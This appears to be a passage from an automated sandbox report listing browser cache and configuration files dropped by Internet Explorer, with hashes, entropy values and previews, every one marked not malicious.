                                                                                                                                                                                                                              SHA-256:F13D8638250DE1808D29F92C6B80F79DDF12C78A875577C87BECBC47B5F47377
                                                                                                                                                                                                                              SHA-512:C790616D0277A5017FF26E416A87FE216C22BC69F99C6224CDAAB9364B571546D994EEBE1426C5E81E928AF9B7F62C1FCFCB494CB48E743ADBE25444B9C7A985
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <root><item name="BT_AA_DETECTION" value="{&quot;ab&quot;:true,&quot;acceptable&quot;:false}" ltime="1230238320" htime="30924955" /></root>
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\IB42RK38\contextual.media[1].xml
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                              Entropy (8bit):2.469670487371862
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:D90aKb:JFKb
                                                                                                                                                                                                                              MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                                                                                                                                                              SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                                                                                                                                                              SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                                                                                                                                                              SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <root></root>
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5EF2C13C-4C8E-11EC-90E5-ECF4BB2D2496}.dat
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5120
                                                                                                                                                                                                                              Entropy (8bit):1.9065712172685974
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:rl0YmGFLQrEgm2p+IaCyJBMu/GgCF/nlWrEgm2p+IaCyJBMu/GeF8Mu0G77/Mu07:rJQGW/4h+WGW/4hj8hth69lW/Hw
                                                                                                                                                                                                                              MD5:A7191FCBA7354DF63848F0E32E44E3B5
                                                                                                                                                                                                                              SHA1:CBD943E767E2A9158615DEF6B6D28E3CE3E21143
                                                                                                                                                                                                                              SHA-256:4D16881E8A8F181F7CB39F490E5B2548FD6A2E395409E081C4D38D4AF1F8035C
                                                                                                                                                                                                                              SHA-512:F21B5449868E60D6BC7D2A85A68DD001B2B798B1FC5CC41F8604480B143E372802F47E6C591AC692FE03AA7E9FFFD96B18634B80B2068AA3B5194A07F0F5C028
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):330752
                                                                                                                                                                                                                              Entropy (8bit):3.59886128947096
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:hZ/2Bfcdmu5kgTzGtIZ/2Bfc+mu5kgTzGt5Z/2Bfcdmu5kgTzGtfZ/2Bfc+mu5kn:Iz3M
                                                                                                                                                                                                                              MD5:F9F14BC733510635E8DB74A98E2766D6
                                                                                                                                                                                                                              SHA1:FA81A1035CE77D6B7B663C58AD1797828D5D556E
                                                                                                                                                                                                                              SHA-256:A0B2AD31B993E2675CF243039790059BA739A4DFD32757A289B06E51614C00E1
                                                                                                                                                                                                                              SHA-512:AA631E62C24848235EC85010B5F110CB4A0D66BF328AD9302ECCDFDF7FEC371B5CDB50FE6674A1A09A6EBAB5218362DFF3DA7B93430068EDAF761111F742513C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):358
                                                                                                                                                                                                                              Entropy (8bit):5.0970008444066845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc41Ep/VoIoUBtTD90/QL3WIZK0QhPPNbVDHkEtMjwu:TMHdNMNxOEpdoIoUBtnWimI00OVbVbkt
                                                                                                                                                                                                                              MD5:B1F3FAC4DE3508CF9AAE72B9A1D8954C
                                                                                                                                                                                                                              SHA1:EB9655A1ECB9D5318595DD148D6F408A8A4477BA
                                                                                                                                                                                                                              SHA-256:B64E776FCA454B340ECF26C3ABFE078D9BDD53BDDE029F1DF54187FFD323D3E2
                                                                                                                                                                                                                              SHA-512:AD0D6D8309FC9CEB8E31FA8DF5019BDE71D79EE884C27D0A32FD2D76849C77CECFC7511CE577FFDAA15F5FD9FF3CA017BB4638092CC972079229A0A05839FFC8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x5cea86ad,0x01d7e09b</date><accdate>0x5d098694,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                                                              Entropy (8bit):5.137422073511568
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4fLGTkpaO6TD90/QL3WIZK0QhPPNbkI5kU5EtMjwu:TMHdNMNxe2kpa7nWimI00OVbkak6EtMb
                                                                                                                                                                                                                              MD5:8B35A6C01C00BC38EFCA757A160B2E30
                                                                                                                                                                                                                              SHA1:F3BDBAF90522F5CC5D6016A4D5E609CBE5B97836
                                                                                                                                                                                                                              SHA-256:16F77854E3DBC6831657E31C9022B4D531D5283FEF93390A4B71CBC0CFF9C94D
                                                                                                                                                                                                                              SHA-512:FDF08DA827A5775558CE078D1C952AFC16BA0612F07DBBD01E4E0B72201DCB2BE0D9D4097A66837325CE216552FF0F8EFC214DCD91D3AFB383C47295CCD5916A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x5b317322,0x01d7e09b</date><accdate>0x5b507290,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):362
                                                                                                                                                                                                                              Entropy (8bit):5.11461645242108
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4GL1e+FR2TD90/QL3WIZK0QhPPNbyhBcEEtMjwu:TMHdNMNxvL1e+/2nWimI00OVbmZEtMb
                                                                                                                                                                                                                              MD5:4498C163B7201DC686B564823A2560B4
                                                                                                                                                                                                                              SHA1:957994F82B8714D568FE72D8B479F1F2D4359F3D
                                                                                                                                                                                                                              SHA-256:68E651B999E0D3C8C0296536AF9FC1483D7AFBFF7565F5F680F0E20AC06EDA1D
                                                                                                                                                                                                                              SHA-512:79A49770C9CD56A2FCE8EF42630440168A15AE4AAE3A1EE3AC6E8B237A896B561451D8E25375515774C68863EB91A3C74EA9ABC2EAE4DD15B9EFF8BE75A1BA0C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x5d2883df,0x01d7e09b</date><accdate>0x5d405a1e,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):352
                                                                                                                                                                                                                              Entropy (8bit):5.107217072236228
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4JuBnotTD90/QL3WIZK0QhPPNbgE5EtMjwu:TMHdNMNxiVtnWimI00OVbd5EtMb
                                                                                                                                                                                                                              MD5:48CF4F5B7D7AD1490C663CA70A4C8E51
                                                                                                                                                                                                                              SHA1:A0514DE8485EA9215E5625D1D30128F0FDF0C609
                                                                                                                                                                                                                              SHA-256:A3CB4A5AA29D72BEF68F9B033CC17F0C6255F793DA917A22CB0674B644223167
                                                                                                                                                                                                                              SHA-512:66BF8EF55B701DC7E6628AE8A323636E0A56B903367986CDED7C995A4F32BEB3AB4B8FEB3BCA03CA45BF808F3462D7D001E6F0B08A24ED76555F3B5C9E7D9875
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x5c0f2e19,0x01d7e09b</date><accdate>0x5c5b78e6,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):358
                                                                                                                                                                                                                              Entropy (8bit):5.1228504566378605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4UxGwe0KVTD90/QL3WIZK0QhPPNb8K0QU5EtMjwu:TMHdNMNxhGwYnWimI00OVb8K075EtMb
                                                                                                                                                                                                                              MD5:C6B6BC244C99F61BABCE2FBCB22E64D9
                                                                                                                                                                                                                              SHA1:35A3081339A890731A22CB85DDFE5D4DC528B323
                                                                                                                                                                                                                              SHA-256:BEFD9D0864A11740FD1D2194421C6EA1B231F667F602F240F45B1AB2C0423DD0
                                                                                                                                                                                                                              SHA-512:FB00C826781DB7370F2C1A0059C5BE1248B0BEC93648A7953ADBB11A7336265E8DDC5F68148D9C1D91B3FF78CCF53D45A71F66A62B8D5A6F7642E72AB2BF11CA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x5d6da6d7,0x01d7e09b</date><accdate>0x5d8ca4fa,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                                                              Entropy (8bit):5.081707677158787
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4QunT7otTD90/QL3WIZK0QhPPNbAkEtMjwu:TMHdNMNx0nTktnWimI00OVbxEtMb
                                                                                                                                                                                                                              MD5:47652013AFC9AF67190B37EB614D396C
                                                                                                                                                                                                                              SHA1:C51501AC8B9CEF00D071F79E4CD282D716D6BB4D
                                                                                                                                                                                                                              SHA-256:3AF31E81025325A3632FB3E16B9C8DC5682F93DC5855DC430A3F02B1DE861D57
                                                                                                                                                                                                                              SHA-512:EA8D363513CA0A607616EEC8B9B943CD746D2C84E9CBB620358EB41BBB1B7F2C37C17FE8E7D71EF44FF1839DD109F3576CF2A21DFA97EB5F8A56DFE7E7A815F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x5cb613fa,0x01d7e09b</date><accdate>0x5cd510d6,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):358
                                                                                                                                                                                                                              Entropy (8bit):5.15587133580377
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4oTMKg5WTD90/QL3WIZK0QhPPNb6Kq5EtMjwu:TMHdNMNxxMVcnWimI00OVb6Kq5EtMb
                                                                                                                                                                                                                              MD5:0EB17AA2E180F04788F785319FC39B4C
                                                                                                                                                                                                                              SHA1:2248ADB5B5FE871D76E86773E8FD163AE17CF4CA
                                                                                                                                                                                                                              SHA-256:258975832AD973D8DC8314326734FFB84E3375CF48009530E522D2BAEC9C4030
                                                                                                                                                                                                                              SHA-512:56204FCEFB628C2B7A0A161B0C08034811F0244073574B6E1C11D6464D2DE4964A60C75B1C79DD50022BCE14688FB08AD2D4153224A6282C618CC3C8B851FD2B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x5c781627,0x01d7e09b</date><accdate>0x5c971518,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):360
                                                                                                                                                                                                                              Entropy (8bit):5.11597956611254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4YX2nxbCR3+tTD90/QL3WIZK0QhPPNb02CqEtMjwu:TMHdNMNxcVCRGnWimI00OVbVEtMb
                                                                                                                                                                                                                              MD5:AD6D14E1F6A7EAB6D68C17CB61A79D32
                                                                                                                                                                                                                              SHA1:9C00B35B4962FBA3522CA4984A835ACFC52FDB4B
                                                                                                                                                                                                                              SHA-256:0B97A3543161D5EAC060D387075AB6C6298C2DD0FDCDC45066BACFA6D6BD2770
                                                                                                                                                                                                                              SHA-512:35EACE8ECC26E15D1A1E5D6C7CD7D331B6ED28084053C2153C479267E785CC916F30CC7C9578C16E259ECBB9629083BCF7526FA4E1592309161D3F0C8574E447
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5b7697ab,0x01d7e09b</date><accdate>0x5bc2e279,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                                                              Entropy (8bit):5.109820030314615
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4In1Mb3UBtTD90/QL3WIZK0QhPPNbiwE5EtMjwu:TMHdNMNxfnm3YtnWimI00OVbe5EtMb
                                                                                                                                                                                                                              MD5:38BA1865E79F13A9C6144FF8805DAC18
                                                                                                                                                                                                                              SHA1:A7FB833B9D86256754C01619C379BD9000A86300
                                                                                                                                                                                                                              SHA-256:E83FD15047BD1631464CA165C076679E74EF52B207D974DCE1508DDCF7EB3E49
                                                                                                                                                                                                                              SHA-512:A01720EC47223E0B36EFD56B3E67C3771D3AB77527853A33A7E9A407502DF489A500CAF7C963798F77ABCAA99FF714F6C02B0255AF09C664C1E1AB6750EEEA51
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x5bd858d8,0x01d7e09b</date><accdate>0x5bf75616,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21318
                                                                                                                                                                                                                              Entropy (8bit):4.109053117861958
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:yQQQQQtzS29dcBUXqYkE1fwDzXrzS29dcBUXqY:bzSAcBykEBczbzSAcBq
                                                                                                                                                                                                                              MD5:AFAFED39473C261B5057A5DADAB60447
                                                                                                                                                                                                                              SHA1:4646A2A85D04594044597A771FE5912685023281
                                                                                                                                                                                                                              SHA-256:D87F66224329BD8EED915F49DAA1F5A7B13984A941E3D7FA1586CE164CDC7112
                                                                                                                                                                                                                              SHA-512:81B24BECA1D93E4EEF591EFD1A9A5AD27D96B4B355DCEA8E4A6F3B192F50E133B8934F4FA3B67C2A5774178AA770D7BD2CDE029088C4A5E75A38DCA2B3ABD466
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\4996b9[2].woff
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):45633
                                                                                                                                                                                                                              Entropy (8bit):6.523183274214988
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                                                                                                                                                              MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                                                                                                                                                              SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                                                                                                                                                              SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                                                                                                                                                              SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\55a804ab-e5c6-4b97-9319-86263d365d28[1].json
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3278
                                                                                                                                                                                                                              Entropy (8bit):4.87966793369991
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Oy9Dwb40zrvdip5GKZa6AyYs9vjxWCKTS2jQt4ZaX:zqlipc6vxLCSCbZaX
                                                                                                                                                                                                                              MD5:073E1A67C16B7E2B0F240F20BAC53174
                                                                                                                                                                                                                              SHA1:778663FBA0201814BE193EB38E4F9D8875F322ED
                                                                                                                                                                                                                              SHA-256:886E0D5D43DFB17D92EB8C5C80AB0671ED9DE247EC4AD9D71B358F32F7613287
                                                                                                                                                                                                                              SHA-512:97FA869A8BE850E759BDB5AAA0E850B787358CC4EED55796F6B51D1AFD5B6B25CF7A6FAC5FCD67AA9588876F208D40449ED94886046177B6FEAA083743B01696
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: {"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":true,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","gb","ws","gd","ge","gg"
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAHxkqw[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):780
                                                                                                                                                                                                                              Entropy (8bit):7.63276321014427
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/7vOWYWeiBpmTUOEd01LuUviHQKP1tha71TDeII+HKV9WGGd4BzLNjFQFP68:IPec4UOEkIQK5CTiGSXGP68
                                                                                                                                                                                                                              MD5:9EC146F1EC3EEF5735E36A1BE63B9C67
                                                                                                                                                                                                                              SHA1:411DA70ACA1DB1A0D3F8B5F1ED616BD30C7AF310
                                                                                                                                                                                                                              SHA-256:63C7EAE620F3D8F17ED979A7A09CCBFFB1577FCE29772CC3C8FEB1B6C2751856
                                                                                                                                                                                                                              SHA-512:1F684E83509B4D92A9651ED1DDB35F09B206EE3824546BADD3CB2FD565155D752439A47E39E23F95C4051247F5DA37E8329769C3750A93D1D99CD47D7A5A17E7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAQT0oN[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49430
                                                                                                                                                                                                                              Entropy (8bit):7.968250182302868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ISMx6UYVvLG0DAyhz+1V+dqheEiic7giJRS8p3BDvaUj5OeGWFxl4e2fxgspTlQ/:ISMsUYVHbmEdqheH/gRkvaUNhGeke+zS
                                                                                                                                                                                                                              MD5:778D5F7FF643535754426B22D1655699
                                                                                                                                                                                                                              SHA1:033850198C0E81418CCF29ADAEA98D8814AA5F96
                                                                                                                                                                                                                              SHA-256:79E97D0F92A1E054FE44AAD7CDBF21C2D918DF000B9C0DB374DC3B186AA212C1
                                                                                                                                                                                                                              SHA-512:B5C228EC6033866669A7D3B36FA29BE171B48745F0FDF857E330B0EE31AF36BAEACDE2CBA7DB62C8DBA84E9736EDA62DC6811A27C1B0F793F6D915032F570B38
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAQVPm6[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2403
                                                                                                                                                                                                                              Entropy (8bit):7.807847874907652
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:QfAuETAzOifN8pL/nF/TFZoTy7zOWk0ljjGzRi3wWLtWOqO+zgtO:Qf7EwN8tndAW7zI0l0SRnqO+zgtO
                                                                                                                                                                                                                              MD5:10BDCE1F28F778B6F7C76D396A88A0A3
                                                                                                                                                                                                                              SHA1:705B774818562E65F4C0DC64A08D8D1E38932772
                                                                                                                                                                                                                              SHA-256:EB966433ADA42DEA9BE343ECAFA32C13851D1ADAF91734E0697D96AE3B876D0A
                                                                                                                                                                                                                              SHA-512:1BD59BED9431C26C14AA4545A6B459680BBDD855E20CE1FE2A5BD4B861DAA793CA9FA6EAF96F353099440E80DD2046E54577DD0B329C45B8EA5FE13CB08B67D0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAQVTlD[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11634
                                                                                                                                                                                                                              Entropy (8bit):7.950478399271463
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:QnXAknmy3tImAVaB4KGSiFtapviNhXgb63atNrT14vc7PX2XpnSkUMJjcmX+:0XAknB3tIDk4/7fNhXgbUatNrT1tott+
                                                                                                                                                                                                                              MD5:4168D8846819EE038AF7AC491FDB0EF5
                                                                                                                                                                                                                              SHA1:2933B9B253C14D9D515D4E7065BCE93243B819FD
                                                                                                                                                                                                                              SHA-256:85721294758FCF121AF77C628960BD6379D9F6D9A69B888CA5EEBE12790173CA
                                                                                                                                                                                                                              SHA-512:2F85B52188672BB53F92C7B80A8F2E3B2B31D0E6F99A3CB4D5D2C89A5F414CCC697DD6709689E619126902E6D0F7CB7866C8A2B3E6EECA8D3319F438DBBF8523
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAQXiHB[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
